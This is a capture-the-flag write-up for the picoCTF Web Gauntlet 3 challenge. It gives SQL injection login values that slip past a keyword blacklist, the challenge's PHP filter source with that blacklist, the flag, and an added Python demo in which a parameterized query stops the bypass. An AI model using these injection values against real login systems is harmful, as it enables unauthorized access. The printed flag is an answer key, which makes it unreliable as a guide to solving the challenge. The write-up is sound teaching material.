Last time, I promise! Only 25 characters this time. Log in as admin
Site: http://mercury.picoctf.net:29772/
Filter: http://mercury.picoctf.net:29772/filter.php
The challenge is exactly the same as Web Gauntlet 2, but we now have a 25-character total limit across the username and password fields.
Thankfully, our solution for Web Gauntlet 2 is under this limit and also works for this challenge, so we can use the same values. For a more detailed explanation, see that writeup: https://github.com/ZeroDayTea/PicoCTF-2021-Killer-Queen-Writeups/blob/main/WebExploitation/WebGauntlet2.md.
Final values for login:
username: ad'||'min
password: a' IS NOT 'b
After inputting these values for username and password, we log in and get the message "Congrats! You won! Check out filter.php". Reloading the filter.php file at http://mercury.picoctf.net:29772/filter.php, we get the source code for the challenge along with the flag in the comments, just as for Web Gauntlet 2.
<?php
session_start();

if (!isset($_SESSION["winner3"])) {
    $_SESSION["winner3"] = 0;
}
$win = $_SESSION["winner3"];
$view = ($_SERVER["PHP_SELF"] == "/filter.php");

if ($win === 0) {
    $filter = array("or", "and", "true", "false", "union", "like", "=", ">", "<", ";", "--", "/*", "*/", "admin");
    if ($view) {
        echo "Filters: ".implode(" ", $filter)."<br/>";
    }
} else if ($win === 1) {
    if ($view) {
        highlight_file("filter.php");
    }
    $_SESSION["winner3"] = 0; // <- Don't refresh!
} else {
    $_SESSION["winner3"] = 0;
}

// picoCTF{k3ep_1t_sh0rt_30593712914d76105748604617f4006a}
?>
Note: If you successfully ran the SQL injection but still see nothing in the filter.php file, try clearing your cache and then reloading, or use a different browser, to get the source code with the flag.
picoCTF{k3ep_1t_sh0rt_30593712914d76105748604617f4006a}
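Why the blacklist in filter.php does not stop the login values above, and what does: the following is an added example, not code from the challenge or the original writeup. It replays the filter list from this page against a string-built SQLite query and then against a parameterized one. The query shape, the `users` table, the stored password and the case-insensitive per-field matching are assumptions, since the page does not show the login code.

```python
import sqlite3

# Blacklist copied from the filter.php source above. Case-insensitive substring
# matching per field is an assumption about how the challenge applies it.
FILTER = ["or", "and", "true", "false", "union", "like", "=", ">", "<",
          ";", "--", "/*", "*/", "admin"]
MAX_TOTAL = 25  # combined username + password length limit from the challenge

def passes_filter(username, password):
    """Return True when the input gets past the length check and the blacklist."""
    if len(username) + len(password) > MAX_TOTAL:
        return False
    fields = (username.lower(), password.lower())
    return not any(word in field for field in fields for word in FILTER)

def make_db():
    """Constructed sample table; the real schema is not shown on the page."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'constructed-secret')")
    return db

def vulnerable_login(db, username, password):
    """Assumed challenge behaviour: blacklist, then string-built SQL."""
    if not passes_filter(username, password):
        return None
    sql = ("SELECT username FROM users WHERE username='%s' AND password='%s'"
           % (username, password))
    # 'ad'||'min' concatenates to 'admin' inside SQL, after the filter ran.
    # (password='a') IS NOT 'b' compares 0 or 1 with 'b', which is always true.
    row = db.execute(sql).fetchone()
    return row[0] if row else None

def safe_login(db, username, password):
    """Hardened form: bound parameters are data and are never parsed as SQL."""
    row = db.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (username, password)).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    db = make_db()
    u, p = "ad'||'min", "a' IS NOT 'b"  # login values from the writeup
    print("passes blacklist:", passes_filter(u, p))
    print("string-built query logs in as:", vulnerable_login(db, u, p))
    print("parameterized query logs in as:", safe_login(db, u, p))
```

With bound parameters the quotes and operators arrive as literal characters in the compared value, so no keyword blacklist or length limit is needed to keep the query structure fixed.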